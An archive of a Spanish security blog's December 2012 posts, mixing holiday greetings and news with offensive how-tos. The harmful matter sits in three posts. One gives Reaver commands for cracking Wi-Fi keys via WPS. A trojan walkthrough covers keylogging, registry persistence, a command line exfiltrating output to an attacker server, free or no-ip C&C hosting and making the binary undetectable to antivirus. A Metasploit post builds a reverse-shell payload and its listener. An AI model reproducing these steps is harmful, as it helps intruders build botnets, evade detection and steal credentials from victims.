31 dic 2012

Vulnerabilidad WIFI mediante WPS

Hola a tod@s!

WPS o Wi-Fi Protected Setup como dice la Wikipedia WPS es un estándar promovido por la Wi-Fi Alliance para la creación de redes WLAN seguras. En otras palabras, WPS no es un mecanismo de seguridad por sí, se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas (SOHO). Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación.

Vamos al lío. Lo primero nos descargamos Reaver.Una vez situados en la carpeta donde descargamos Reaver lo descomprimiremos:

airmon-ng start wlan0

wash -i mon0

reaver -i mon0 -b 00:00:00:00:00:00 -vv   (En este paso os dará el PIN, atentos)

reaver -i mon0 -b 00:00:00:00:00:00 -p PIN -vv  (Y listo os dará en texto plano la clave)

Este método de sacar la clave resulta un poco pesado, pues puede durar entre uno y tres horas dependiendo de la calidad de la señal.

Os dejo con este vídeo que me sirvió mucho para realizar estas pruebas. Y señores desactiven WPS de sus routers.

[youtube 0Fs_hRuRZ8U nolink]

No seáis malos ;)

Artículo cortesía de Francisco Javier Santiago Vázquez (Estación Informática)

30 dic 2012

Informe Flu – 104

Comenzamos con el resumen de una semana cargada de contenidos:

Lunes 24 de Diciembre
  • Arrancamos la semana con el artículo Flu: un troyano educativo, que ifsecurity dedicó a nuestro querido proyecto, ¡gracias!
Martes 25 de DiciembreMiércoles 26 de DiciembreJueves 27 de Diciembre

Viernes 28 de Diciembre

Sábado 29 de Diciembre

29 dic 2012

Publicada Bugtraq 2: Black Widow (Versión Beta)

Buenas a todos, hemos vuelto de nuestro viaje en barco para seguir en Flu Project dándolo todo. Hoy queríamos anunciaros que nuestros amigos del BugTraq Team han lanzado su nueva distribución de Seguridad "Bugtraq 2: Black Widow" en versión Beta.Estamos preparando una Review que publicaremos próximamente sobre sus herramientas, servicios y características que más nos han sorprendido (y no son pocas precisamente ya que han hecho un gran trabajo, enhorabuena). ¡Y atentos al blog!De momento, os dejamos con el enlace pasa su descarga y con algunas de sus características principales:
  • Bugtraq 2 se basa en el Kernel PAE 3.2 y 3.4
  • Cuenta con una amplia gama de herramientas forenses, de pentesting, y de anti/lab/malware. Incluyendo entre otras, desde los populares BeeF y Nessus, hasta las últimas novedades como Cuckoo o algunos de nuestros juguetes que hemos cedido al proyecto :)
  • Está disponible con XFCE, Gnome y KDE basada en Ubuntu, Debian y OpenSUSE.
  • Tiene soporte para 12 idiomas

Pronto publicaremos la Review Oficial de Flu Project ;)Saludos! 

28 dic 2012

Flu Project se despide hasta siempre, muchas gracias por el tiempo que habéis estado ahí

Buenas a todos, en la vida hay decisiones complejas de tomar, y esta es una de ellas. Han sido 2 años fantásticos a vuestro lado, pero estamos muy cansados, el tiempo pasa factura y se nos han agotado las ideas. Dejamos también la informática, que ya nos aburría enormemente al igual que el mundo de la seguridad de la información, y nos hemos alistado a la marina.

No tenemos intenciones de perder la web de Flu Project que esperamos que siga operativa (aunque sin actualizar contenidos), para que la información que contiene siga pudiendo ser visualizada, al menos hasta que el paso de los años haga que su información ya no tenga ningún valor...

De vez en cuando colgaremos en el blog alguna fotografía de nuestros viajes para que podáis saber de nosotros.

Desde que montamos la oficina en Algete (http://www.flu-project.com/flu-project-monta-su-primera-oficina-fisica-en-algete.html) no hemos tenido vida social, trabajo, trabajo y trabajo, que si proyectos con la N4SA, que si Kim Sung Rocky VII hacednos una botnet, que si .Com programanos un mega-trix... ¡estamos cansados, lo dejamos!

Muchas gracias por estos años de felicidad a vuestro lado, sois GRANDES

¡Hasta siempre!

Fdo. Juanan y Pablo

28 de Diciembre de 2012

 Actualización 29 de Diciembre de 2012: Este artículo era una broma del día de los Santos Inocentes, celebrado en España el día 28 de Diciembre

27 dic 2012

Reflexiones de unos tipos normales

La navidad pasa por todos nosotros, el nuevo año se acerca y los Mayas, en parte, se equivocaron y el mundo no ha acabado, al menos aún... En estas fechas en las que las familias se juntan y hablan de todo lo que les ha pasado, lo mal que está el trabajo, los malos pronósticos del futuro, la sanidad en España que se complica por momentos, que la gente no quiere que le toquen lo suyo, pero si quieren tocar lo de los demás, en estas épocas parece que no hay mejoría posible... Desde aquí no queremos politizar el blog, ni mucho menos, solo deseamos que la cosa mejore, y que la gente tenga trabajo, que los que lo tenemos hagamos un sobre esfuerzo, y que la gente se una en una sola dirección... y que esos gobernantes, que da igual quien sea, haga lo posible para que la cosa mejore. Da igual quien este en el poder, si éste corromperá al que llegue...

Felices Fiestas, y al menos hay cosas que no valen dinero: amigos, familia, compañía, historias, sonreír... :)

Os dejamos con unos posts recopilatorios de Flu Project:

Hijacking

HIjacking automatizado

Un forense llevado a juicio

SQL Injection

Análisis PDF

Troyano casero

Analizando BlackHole Exploit con Cuckoo

Mimikatz

Impersonalización (Pass The Hash!)

26 dic 2012

Vulnerabilidad Samsung Smart TV

Os acordáis de aquellos relojes en los que se podía cambiar los canales de la televisión. En los que te invitaba tu vecino a merendar en su casa y entre colacao y bocata os divertíais cambiándole de canal la TV y fastidiándole la novela a la madre de tu amigo. Pues a partir de hoy lo podréis hacer en casa de vuestra suegra. Eso sí, si vuestra suegra tiene un televisor Samsung.Gracias a ReVuln Ltd que ha descubierto una vulnerabilidad de día cero en el Samsung Smart TV que permite a los malos obtener información importante, acceso al monitor y a la raíz del dispositivo de forma remota.Aún no se sabe con certeza qué modelos fueron afectados por esta vulnerabilidad.Así que si tenéis un televisor Samsung Smart TV cuidado, te pueden fastidiar la tarde de fútbol.Han demostrado como se realiza el ataque en el siguiente vídeo:

[vimeo 55174958 nolink]

http://vimeo.com/55174958

No seáis malos ;)

 Artículo cortesía de Francisco Javier Santiago Vázquez (Estación Informática)

 

25 dic 2012

¡Feliz Navidad!

Buenas a todos, hoy día de Navidad queríamos aprovechar todo el equipo de Flu Project para desearos unas felices fiestas y todos nuestros mejores deseos para el próximo año 2013. Esperamos que entre todos podamos hacer de 2013 un gran año con menos guerras, menos enfrentamientos, menos rencores, menos sufrimiento, menos crisis, menos ladrones, menos corruptos y mucha más generosidad con los más desfavorecidos, mucha mucha más igualdad entre clases y mucha mucha mucha más felicidad.

Vesele Vianoce. A stastlivy Novy Rok Vesele bozicne praznike in srecno novo leto Gajan Kristnaskon Rõõmsaid Jõulupühi Zorionak eta Urte Berri On Cristmas-e-shoma mobarak bashad Hyvää Joulua or Hauskaa Joulua Zalig Kerstfeest en Gelukkig nieuw jaar Joyeux Noël et Bonne Année Nollaig chridheil agus Bliadhna mhath ur Nadolig LLawen a Blwyddyn Newydd Dda Bo Nadal e feliz aninovoKala Christougenna Kieftihismenos O Kenourios Chronos Mele Kalikimaka Mo'adim Lesimkha. Shana Tova Vrolijk Kerstfeest en een Gelukkig Nieuwjaar Kellemes Karacsonyiunnepeket & Boldog Új Évet Selamat Hari Natal Merry Christmas and Happy New Year Idah Saidan Wa Sanah Jadidah Nollaig Shona Dhuit Gledileg Jol og Farsaelt Komandi ar Buon Natale e Felice Anno Nuovo Shinnen omedeto. Kurisumasu Omedeto Natale hilare et Annum Nuovo! Prieci'gus Ziemsve'tkus un Laimi'gu Jauno Gadu Linksmu Kaledu Streken Bozhik Selamat Hari Natal Nixtieklek Milied tajjeb u is-sena t-tabja Kung His Hsin Nien bing Chu Shen Tan Meri Kirihimete Zul saryn bolon shine ony mend devshuulye God Jul og Godt Nyttår Polit nadal e bona annada Bikpela hamamas blong dispela Krismas na Nupela yia i go long yu Wesolych Swiat Bozego Narodzenia i Szczesliwego Nowego Roku Boas Festas e um feliz Ano Novo Mata-Ki-Te-Rangi. Te-Pito-O-Te-Henua Sarbatori vesele Pozdrevlyayu s prazdnikom Rozhdestva is Novim Godom ciid wanaagsan iyo sanad cusub oo fiican Wilujeng Natal Sareng Warsa Enggal God Jul och Gott Nytt År ºKrismas Njema Na Heri Za Mwaka Mpyaº Suksan Wan Christmas lae Sawadee Pee Mai Nathar Puthu Varuda Valthukkal Noeliniz Ve Yeni Yiliniz Kutlu Olsun Veseloho Vam Rizdva i Shchastlyvoho Novoho Roku! Chuc Mung Giang Sinh Sinifesela Ukhisimusi Omuhle Nonyaka Omusha Onempumelelo

Feliz Navidad y Próspero Año Nuevo

Flu Project Team

24 dic 2012

Flu: un troyano educativo, por ifsecurity

Hace algunos días desde el blog de ifsecurity publicaron un artículo que nos encantó sobre nuestro troyano Flu. Han pasado muchas horas de investigación con él y pensamos que sus comentarios aportan mucho valor al proyecto, por lo que os dejamos a continuación su artículo que podéis ver desde su fuente original aquí. ¡Gracias!

Flu: un troyano educativo

Que tal, pues ya tenia demasiado que no publicaba nada, pero pues cuestiones de la escuela de estar arreglando unos asuntos pues no tuve tiempo. pero he regresado y les traigo un proyecto de un troyano educativo. Bueno para empezar veremos que es el projecto Flu.

¿Que es Flu Project?

Flu project es un proyecto que nace de la inquietud de dos mentes por iniciar un proyecto en comunidad sobre la temática de la seguridad de la información y el malware, en el que todos los usuarios puedan participar para compartir sus conocimientos y aprender de otros usuarios.

El proyecto consiste en el desarrollo de una aplicación para el control remoto de máquinas Windows a través del troyano Flu, orientado a la generación de botnets a través de la tecnología HaaS.

Qué es Haas?

El término HaaS (Hacking as a Service) deriva de las siglas SaaS, Software as a Service. SaaS es un modelo de distribución de software en donde se provee el servicio de mantenimiento y soporte del software que utilizan varios clientes desde un único punto.

HaaS es una variante de SaaS orientada al Hacking. En el caso de este proyecto HaaS hace referencia a la generación de botnets a través de un troyano para entornos Windows.

¿Qué es Flu?

Flu es un troyano reverso orientado a la construcción de botnets, también conocidas como redes de máquinas zombies. Se encuentra diseñado con una arquitectura cliente-servidor.

El servidor consiste en un pequeño ejecutable programado en C# que permitirá infectar cualquier sistema operativo Windows, incluyendo Windows 7, para conseguir el control de la máquina en la que se hospeda.

El cliente se encuentra desarrollado en PHP y corre sobre un servidor web Apache. Su objetivo es proporcionar los comandos a todos los servidores Flu que haya repartidos por Internet para obtener información de las máquinas en las que se encuentran instalados, y almacenarla en el servidor web.

La información de los usuarios podrá ser consultada desde el servidor web en cualquier momento desde una interfaz gráfica desarrollada en HTML y PHP.

Funcionalidades

En esta sección se hablarán de las distintas funcionalidades que componen a Flu. Se dispone de unas aplicaciones básicas, es decir, vienen desde la primera versión. Cuanto mas avance el proyecto, más funcionalidades se irán añadiendo, ya sea por gente que se una al proyecto o por parte nuestra. Somos todo oídos para las nuevas ideas, y nuevas funcionalidades implementadas.

- XML Reader

Objetivo: poder ejecutar instrucciones como si estuviéramos físicamente en la márquina remota. Además de este modo se puede saltar por defecto los Firewalls, ya que es tráfico saliente el que se genera y se realiza una petición a un servidor web por puerto 80.Descripción: XML Reader es un módulo el cual permite a Flu, o al ejecutable de infección, cargar un fichero XML que se pide a través de una petición HTTP. Simplemente, este módulo realizará la petición a un servidor web que el atacante tiene en Internet o una máquina privada del atacante que contiene un servidor web. En este servidor web el atacante tendrá configurado un fichero XML con las órdenes a ejecutar en la máquina infectada.La estructura del fichero XML es la siguiente:- Raíz del documento, Instructions. Este bloque da comienzo al fichero XML y cierra el contenido del fichero. Dentro de este bloque nos encontramos con la versión del fichero XML, y la instrucción/es a ejecutar.- Version. Esta etiqueta especifica el número de versión del documento. Esto es necesario porque Flu carga el fichero XML cada cierto intervalo de tiempo especificado en su código. Entonces, para que Flu no ejecute instrucciones pasadas, se da un tiempo al atacante para cambiar las órdenes ejecutadas por otras, y para que Flu detecte que el número de versión del fichero ha cambiado por lo que debe ejecutar las nuevas órdenes. Es necesario que sea el atacante el que cambie el número de versión para que Flu ejecute las nuevas órdenes.- Instruction. Esta etiqueta especifica la instrucción a ejecutar. Puede haber más (muchas más) de una etiqueta Instruction. Esta etiqueta tiene 2 atributos, type y argumento, el primero alberga el comando a ejecutar en el equipo remoto, y el segundo, contiene los distintos argumentos que puede recibir el comando.

Ejemplo de fichero XML:

<?xml version="1.0"?><instructions>  <version num="12" />  <instruction type="arp" argumento="-a" />  <instruction type="cmd" argumento="/c ver" />  <instruction type="cmd" argumento="/c dir c:\Users" /></instructions>

- Process Register

Objetivo: registrar el ejecutable de infección o Flu, para que se inserte en el registro de Windows. Con esto se busca que al iniciar sesión, el usuario infectado, Flu arranque automáticamente.

Descripción: Process Register es un módulo, el cual Flu ejecuta para registrar su ejecutable en el registro de Windows. La ruta del registro dónde Flu registrará a su ejecutable es la siguiente:

Equipo\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Por lo tanto una de las maneras de ver si estáis infectados sería comprobar esa ruta del registro y ver si hay algo raro… aunque la víctima no debe esperar un flu.exe, hay que ocultar un poco.

KeyLogger

Objetivo: capturar todas las pulsaciones de teclado que realice la víctima. Con esta funcionalidad se dota de un área de espionaje a Flu, ya que se puede observar lo que la víctima escribe. Una gran posibilidad es la de capturar login y password de formularios con este efecto.
Descripción: este módulo se encarga de captar todas las pulsaciones de teclado que la víctima realiza en su máquina. Este módulo recibe un nombre de fichero, configurable en el código fuente, que será el fichero dónde se almacenarán todas las pulsaciones de teclado de la víctima. El módulo incorpora una función que se encarga de cada ‘x’ tiempo pasar lo que se ha almacenado en un buffer declarado (todas las pulsaciones) al fichero pasado como parámetro en la construcción del objeto.
Como curiosidad se explica a continuación como es la construcción del objeto KeyLogger:
KeyLoggerLocal.KeyLogger kl = new KeyLoggerLocal.KeyLogger("c:\\Users\\" + Environment.UserName + "\\_debug_err_win_32.txt");
El fichero, al almacenarse en el equipo de la víctima, puede ser interesante ocultarlo lo máximo posible. En el ejemplo no está oculto para nada, ya que aunque el nombre del fichero no es muy llamativo al usuario medio, se encuentra en la carpeta personal del usuario infectado. Podría ser interesante ejecutar algún comando o instrucción con XML Reader, el cual ocultara el fichero o lo almacenase en un lugar más rebuscado u ofuscado. O simplemente, modificando su código fuente, para que el fichero del keylogger se cree en un lugar más “profundo”. Todas las mejoras que se os ocurran podréis proponerlas desde el subforo de propuestas, para tratarse y ser debatidas entre todos y posteriormente implementarlas.

Console

Objetivo: crear una consola, la cual permita a Flu ejecutar las instrucciones u órdenes que se reciben en el fichero XML, desde el módulo XML Reader. Este módulo es de vital importancia ya que es uno de los núcleos del proyecto. Conseguir que las instrucciones que se reciben sean ejecutadas de forma “trasparente” a la víctima, es decir, todas estas instrucciones se ejecutan en la máquina víctima sin que éste este al tanto de ello.Descripción: este módulo recibe un comando, lo que en el fichero XML se denominaba type, y un argumento, el cual se denomina igual en el fichero XML descargado. Crea una Shell o CMD, y ejecuta el comando que recibe con su argumento correspondiente. Comentar que esta ejecución se realiza en segundo plano, de forma no visible a la víctima.La salida de la ejecución de los comandos será enviado, a través del módulo Navigation, al atacante. De este modo el atacante obtendrá la información sobre las acciones que ejecute siempre y cuando los comandos que se ejecuten muestren una salida.

Navigation

Objetivo: enviar los resultados de la ejecución de las instrucciones a un servidor web manejado por el atacante mediante PHP. En este servidor la información se clasificará en función del usuario o dirección IP. Con estas acciones un atacante puede tener la información clasificada y puede estudiar vulnerabilidades y características de los equipos infectados.Descripción: este módulo presenta la forma en la que la información que devuelve la Shell tras la ejecución de las instrucciones escritas por el atacante es enviada al servidor web que manipula el atacante. El servidor web tiene detrás una aplicación PHP (la cual también es entregada con el código fuente).Esta aplicación tiene un parámetro, el cual puede ser denominado clave, que se denomina “respuesta”. Por lo que las peticiones de devolución de información al servidor web se realizarán de la siguiente manera:
wb.navigate("http://192.168.1.33/RecibirDatosVictima.php?respuesta=" + salida);
En el que wb es un objeto que representa a un web browser interno que lleva Flu. En el ejemplo el servidor web se encuentra en la IP 192.168.1.33, pero esto podría ser cualquier IP o dominio. El fichero, para que se observe claramente, se denominó RecibirDatosVictima.php, y el parámetro respuesta equivale al valor de la variable salida, que será la variable que contiene la ejecución de una instrucción.En definitiva es otro de los núcleos fundamentales del proyecto. Es imprescindible un estudio correcto sobre este módulo e intentar optimizarlo al máximo ya que tampoco se debería inyectar o inundar la red con peticiones PHP.

Ahora que ya sabemos que es Flu les enseñare las pruebas de concepto que estuve realizando.

Bueno primero que nada mostrare algunas pantallas de lo que es el troyano FLU.

carpetas

Al descargarnos Flu  y descomprimirlo tendremos las siguientes Carpetas.

BBDD:  Esta carpeta contiene el archivo .sql que importaremos a la Base de datos de nuestro servidor.

Ejecutables Compilados: Aqui tenemos los archivos ya compilados listos para usarse, contiene 2 archivos. el Flu-Nucleo que es el troyano ya compilado y el otro archivo es Generador de Bots que es el archivo donde generaremos nuestro cliente, aqui en el generador es donde especificaremos la direccion del servidor donde hemos montado nuestra C&C. Tambien el generador de bot contiene la vacuna para desinfectarte de Flu.

Flu-Nucleo:  Aqui es donde contiene el Codigo de Fuente del archivo de Flu-nucleo.exe.

Servidor Web: Son los archivos que cargaremos al servidor de FLU, ya todo esta listo para que nadamas los arrastres por FTP o como tu quieras al servidor web.

Vacuna+generador de bots: Esta carpeta contiene el codigo de fuente del archivo Generadordebot.exe

Les aconsejo que se lean todo el manual de usuario que viene, ahi vienen los pasos para la instalación, flu viene programador para correrlo de manera de Local Host.Pueden descargar WAMP  y seguir las instrucciones del Manual.

Screenshots: 

generador

Este es el generadordebot.exe donde generaremos nuestro archivo final, aqui se especifica la direccion del servidor donde hemos montado la C&C de FLU y tambien la ruta del archivo wee.xml donde leera las intrucciones.Tambien abajo tenemos la opcion de comprar si la computadora esta infectada y poder desinfectarla.

interfaz flu

Esta es la pantalla donde nos logearemos a nuestra C&C ya montada en un servidor web.

pantalla principal

Una vez que ya nos hallamos logeado, nos aparecera las computadoras infectadas con su SO, ip y direccion MAC.Tambien nos aparece el Status si estan disponibles o no (encendidas o apagadas), last Connection que es la ultima vez que el cliente se conecto.El icono que parece un ojo es para ver la ultima instrucion que recibio, puede ser alguna instruccion generada de la Consola o del XML.El iconode un cuadro es para ver los screenshots que hemos tomado de la computadora infectada.Y el ultimo icono es para ingresar a la Consola. donde podremos mandar instrucciones como si fuera una shell.

Last Comand

Esta es la pantalla de Lastcomand donde nos mostrara el ultimo comando recibido del cliente con la Fecha de envio.

Screenshot

Esta pantalla es la de los Screenshots tomados en la computadora infectada,

consola

Esta pantalla es la de la Consola donde podremos enviar cualquier comando como si fuera una shell a la computadora infectada, Vienen comandos ya configurados como el de Captura de pantalla o Descargar un archivo.

Instrucciones XML

En esta pantalla podremos enviar las intrucciones a todas las computadoras mediante el archivo XML, vienen instrucciones ya configuradas, o tambien puedes crear tu instruccion.

En esta pantalla se muestra la seccion donde podremos cambiar la clave de encriptacion del cifrado AES.

administracion de usuarios

Y esta pantalla es el panel donde podremos administrar los usuarios para que tengan acceso al servidor de Flu, por default tiene un Usuario que es admin y password:1234

Como flu project viene orientado a usarlo como localhost, si usteden quieren ingresar a la C&C desde internet, tienen que montarlo en un Hosting.

Pueden usar Hostings gratuitos, yo lo he montado en 4 pero en 2 no funciona muy bien.

Donde me ha funcionado es en el Hosting de 260MB,  pero el problema de este servidor es que no tiene activado el modulo de php_mcrypt y entonces no recibe respuesta de todos los comandos, asi que hay dos alternativas quitarle el cifrado de datos a FLU o cambiar de hosting.

El hosting donde si funciona perfectamente es en 000WebHostel problema es que se tardan en darte de alta tu hosting y te dura muy poco porque violas las politicas del uso de malware. Aqui como quiera les dejo un tutorial que publicaron en el Foro de Fluproject de como montarlo en 000webhost.  http://www.fluproject.hol.es/descargasDirectas/pdf/Configurando_el_Cliente_de_Flu_con_000webhost.pdf

Si ustedes pagan por algun hosting o consigen otro, para que todo funcione bien, tienen que modificar el archivo conexion-bbdd para que pueda conectar con nuestra base de datos.

Por default el archivo viene asi:

<?php$dbhost=”localhost”;//Aqui cambiaremos el Local host, por la direccion de nuestra base de datos Ejemplo: “1hostinggratuito.com.mx”$dbusuario=”root”;  // Aqui es el nombre de usuario que nos brinda o creamos en el hosting $dbpassword=”   “;    // Aqui la contraseña del usuario que pusimos en la parte de arriba$db=”flubbdd”;       //Aqui pondremos el nombre de la Base de datos que hemos creado en el hosting. $conexion = mysql_connect($dbhost, $dbusuario, $dbpassword);mysql_select_db($db, $conexion);?>

Si no sabes como obtener estos datos, lee el manual que publique mas arriba de como configurarlo con 000webhost.

Otro problema que puedes tener, es al importar la base de datos en phpadmin. Al importar el archivo .sql que viene en el fluproject nos dara error en nuestro hosting asi que en el manual viene como crear la base de datos o la otra es importar archivos .sql pero de cada tabla y no de la base de datos completa.Aqui les dejo un link donde he subido los archivos .sql de cada tabla para que no tengan problemas al importar a su phpadmin http://www.mediafire.com/?36w9w58cyyvx9g4

Pero bueno y si lo ustedes es tener su propio servidor web, lo que se puede hacer es crear una maquina virtual con Windows y ahi instalaremos XAMPP.Es parecido a WAMP donde nos correra servicios de apache, mysql, php, etc.Al terminar de instalar xampp en nuestra maquina virtual configuraremos nuestra maquina virtual con una ip estatica.Despues configuraremos nuestro Router para poder agregar una aplicación de HTTP Server a la ip estatica que le asignamos a la maquina virtual en nuestra red local.

Con esto haremos que cuando hagan una peticion a nuestra direccion IP de internet (por el puerto 80) nos redirecciona a nuestra maquina virtual donde estaremos corrientdo XAMPP, osea que podremos ver la pagina principal de la C&C de Flu.

maquina virtual

Aqui nuestra maquina virtual corriendo un Windows 7 con XAMPP.

Pero ahora el problema es que si configuramos el generador de bots usando nuestra ip como servidor, pues como la mayoria tenemos ips dinamicas perderemos a nuestras maquinas infectadas cuando nos cambie nuestra ip

Para esto configuraremos un No-ip   en internet hay muchos manuales de como configurarlo, una vez creado nuestro host de no-ip que nos quedara como “nombredehost.no-ip.org”   descargaremos e instalaremos la herramienta de no-ip llamada DUC  y con esto lograremos a que cuando ingreses a tu host no-ip en este caso “nombredehost.no-ip.org” nos redireccione a nuestra ip osea al servidor XAMPP que tenemos.   DUC es un programa que se encarga de estar actualizando nuestro host verificando la ip que tengamos, asi que cuando se reinicie nuestro modem y se nos asigne otra ip, DUC actualizara nuestro host no-ip y asi no perderemos las conexiones con los clientes.

Asi que en el generadordebots.exe   al generar el cliente en el area de servidor pondremos “nombredehost.no-ip.org”  y en el ubicacion del Archivo XML nos quedara asi “nombredehost.no-ip.org/wee.xml”.

Bueno aqui les mostre varias formas de como montar nuestro FLU, la que les recomiendo es la ultima montar nuestro xampp y usar no-ip asi nadamas cuando encendamos nuestra maquina virtual estara encendido el servidor de FLU.

Ahora tambien otra cosa que estuve haciendo con FLU era que como es un troyano pues tenemos a los enemigos los antivirus.

Al escanear el Flu-nucleo podemos ver que ya es casi detectado por todos los antivirus.

Flu Nucleo Original Virustotal

36 de 46 Antivirus detectan a FLU como un archivo Malicioso.

Entonces pues tenia que encontrar algun metodo de como indetectar FLU a esos antivirus, podemos hacerlo desde lo mas sencillo usando crypters pero el problema esque  el stub dura muy poco indetectable ya que como son publicos pues todos lo usan y suben a virus total y bla bla bla.

Tambien existen metodos mas manuales como el RIT, en internet encontraran muchos manuales sobre este metodo.

Pero como FLU es de opensource pues tenia el codigo de fuente y lo unico que hice fue modificar el nombre a las variables y compilar un archivo nuevo y con esto bajamos el nivel de indetectabilidad mucho.

Flu Nucleo modificacion de variables

Y aqui tenemos solo 5 Antivirus de 45 que lo detectan.

Pero la idea era dejalo FUD, 100& indetectable, entonces al navegar en internet encontre una herramienta hecha por und3ath-Injector que permitia inyectar payloads en el main de un archivo. En este caso usamos la calculadora que el uso en sus PoCs, la verdad si batalle mucho para que funcionara, porque habia que hacerle modificaciones.

Y bueno al final nos quedo esto.

Flu Nucleo FUD

0 de 46 Antivirus.

Ninguna deteccion de ningun antivirus, ahora si nos quedo un Archivo Completamente Indetectable.

Luego investigo mucho mas en como trabaja este ultimo metodo y publico algo y tambien publicar a sobre vectores de infeccion de FLU, nose como usar embed en paginas web, o otro tipo de tecnicas.

Hasta aqui dejo este post que ya lo se hizo bastante grande jajaja

Saludos a todo y no olviden visitar la pagina del Flu-Project   donde encontraran un buen contenido sobre seguridad informatica.

Y tambien dentro de poco prometo postear tambien otra herramienta desarrollada por los de Fluproject que es Anubis una excelente herramienta de Footprinting

ah y me faltaba poner lo de que todo esto es para uso educativo, esto es para todos los malignos que andan por ahi.

Twitter: IvanFlores

23 dic 2012

Informe Flu – 103

Comenzamos con el resumen de una semana cargada de contenidos:

Lunes 17 de DiciembreMartes 18 de DiciembreMiércoles 19 de DiciembreJueves 20 de Diciembre
  • El jueves llegaba nuestra Pantalla Pública XIX, con otros 3 nuevos pantallazos de lo más curiosos en universidades y hospitales. Nadie escapa al poder de vuestras cámaras, gracias!

Viernes 21 de Diciembre

Sábado 22 de Diciembre
  • Ayer no nos tocó la loteria (¡vaya!), por lo que seguiremos al menos otro año más a rumbo de Flu Project :P Además. ayer celebramos el cumpleaños de nuestro compañero Pablo: ¡Feliz cumpleaños Pablo!

22 dic 2012

¡Feliz cumpleaños Pablo!

Buenas a todos, hoy aprovecharé la entrada de este sábado para felicitar a mi compañero Pablo, en su 26 cumpleaños :) Muchas felicidades Pablete! Esta noche lo celebramos como mandan los cánones ;)

Y como no podia ser menos, te dejo con los chicos de Parchis!

[youtube tznBgIGSi98 nolink]

21 dic 2012

Dale a Me gusta o Dios matará a este gatito (o no)

Desde un tiempo a esta parte, Facebook y otras RRSS se están llenando de desaprensivos que se valen del buen corazón de la gente y/o del desconocimiento de estos, para publicitar diversas páginas de facebook, mediante el truco del “Me gusta” viral.Aprovechándose que cada vez que damos a un “Me gusta”, se comunica a todos nuestros amigos, los spammers y varios CMs sin escrúpulos, se aprovechan de imágenes de niños con síndrome de Dowm, para publicitar páginas.gatitos spam facebookLos spammers se valen principalmente de tres argucias.
  • Darse a conocer mediante una foto emotiva de una niña con síndrome de Down (ya he visto usar la misma foto en varias ocasiones) con frases del tipo “Dale un Me gusta a esta princesa”.
  • Hacer creer que ocurrirá algo “especial” si se da al Me gusta en cierta imagen con frases del tipo “Dale un Me gusta a esta imagen, y te sorprenderás”. Si, de lo único que te sorprenderás es en ver como picas con esta idiotez.
  • Variación de la clásica cadena “por cada contacto tuyo que mande este mail, Alfonsito Retruerzos recibirá un dolar/euro/rupia en el hospital Malsanus.” Usan imágenes que se pueden obtener de análisis médicos con simples búsquedas en google images, para hacer picar a la gente con frases del tipo “Por cada Me gusta, recibirá 1€”, “Cuando llegue a los 100.000 Me gustas, el Dr. Estafa le operará gratis” y similares.
Dale me gusta facebookAdivina: No pasa nada y no puede pasar nada!!!dale me gusta hermosa¿Algún tribunal de menores por ahí?
 

Por supuesto que estas son tres de las múltiples imagenes de este tipo que podemos encontrar pululando por Facebook. Hay que estár atento porque desde la gran remodelación que sufrió Facebook a principios de año, están proliferando incluso algunas que se asocian a URLs con troyanos o contenido que incluye MalWare. Hasta que Facebook o la justicia no pongan algún tipo de barrera a esta gente, lo mejor es denunciar y tratar de no picar.

Un Saludo,

Jesusdml

20 dic 2012

Pantalla Pública XIX

 

Buenas a todos, hoy volvemos con nuestra edición número 19 de Pantalla Pública, con varias pantallas muy divertidas que nos han enviado algunos lectores de Flu Project, ¡gracias!.La primera nos la envía @DiSeBla (https://twitter.com/DiSeBla), y en la que aparece un panel informativo de nuestra querida universidad :) ¡Gracias! Siempre nos trae buenos recuerdos saber de ella... :P Continuamos con otra pantalla pública que nos envía desde Twitter @winkasper (https://twitter.com/winkasper). En esta captura nos envía un panel informativo de un Hospital con un bonito Windows XP. Desde luego que así las esperas en el médico son más amenas :)  Por último, os dejo con una pantalla pública en un teléfono con un bonito pantallazo azúl:Saludos!

19 dic 2012

Coqueteando con Metasploit: Meterpreter I

Siguiendo con la saga de Metasploit, hoy iniciaremos una nueva subsaga relacionada conMeterpreter.Pero, ¿qué es Meterpreter?  Según la web de metasploit unleashed y de forma muy resumida es:

Meterpreter is an advanced, dynamically extensible payload 

 Para mas información recomiendo muy encarecidamente que repaséis la web que he comentado antes ;) .Ésta herramienta permite, una vez se ha obtenido acceso al equipo de la víctima, realizar muy diversas acciones como son descargar ficheros, escalar privilegios, utilizar un keylogger o activar la webcam entre otras muchas posibilidades que veremos a lo largo de las entradas que compondrán esta subsaga.Lo primero que haremos será crear un ejecutable con un payload de meterpreter contenido como se ha hecho en otras ocasiones, para ello utilizaremos msfpayload:

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.108 LPORT=31337 X > payload.exe

  Los parámetros importantes de la anterior orden y que se utilizarán posteriormente en el handler (veremos después que es esto) son los siguientes:[-] windows/shell_reverse_tcp  => El payload escogido.[-] LHOST=192.168.0.108  => La IP del equipo donde está ejecutándose Metasploit.[-] LPORT=31337  => El puerto en el que Metasploit está escuchando peticiones.

Lo que hará el binario creado es, una vez sea ejecutado, intentara conectar en la IP y puertos especificados y ofrecernos una shell inversa.  NOTA: En esta entrada supondremos que la víctima ejecuta el archivo payload.exe, la forma de que ésta lo haga o de evadir los antivirus no la trataremos pues ya hemos hablado de ello en otras ocasiones.El siguiente paso es poner a Metasploit escuchando posibles conexiones de la víctima, para ello lo lanzamos con el clásico:

y preparamos el handler, su funcionalidad es esperar conexiones del payload especifico, en el puerto e IP especificados:

use multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.0.108set LPORT 31337exploit

 Donde:[-] use multi/handler => Seleccionamos el handler.[-] set PAYLOAD windows/meterpreter/reverse_tcp => El payload escogido anteriormente en la creación del binario que enviamos a la víctima.[-] set LHOST 192.168.0.108 => Nuestra IP donde está el handler escuchando, es el mismo que hemos especificado anteriormente en la creación del ejecutable enviado a la víctima.[-] set LPORT 31337 => El puerto en el que Metasploit estará escuchando peticiones. Debe ser el mismo que el escogido en el ejecutable enviado a la víctima.[-] exploit => Lanza el handler.

Una vez lanzado esperará a que la víctima ejecute el binario (payload.exe) para que éste establezca conexión con nosotros. Una vez lo haga obtendremos una shell de meterpreter (el prompt cambiará).

